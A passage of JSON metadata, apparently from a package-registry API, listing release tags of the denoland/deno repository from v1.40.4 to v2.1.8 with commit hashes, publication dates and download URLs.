commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v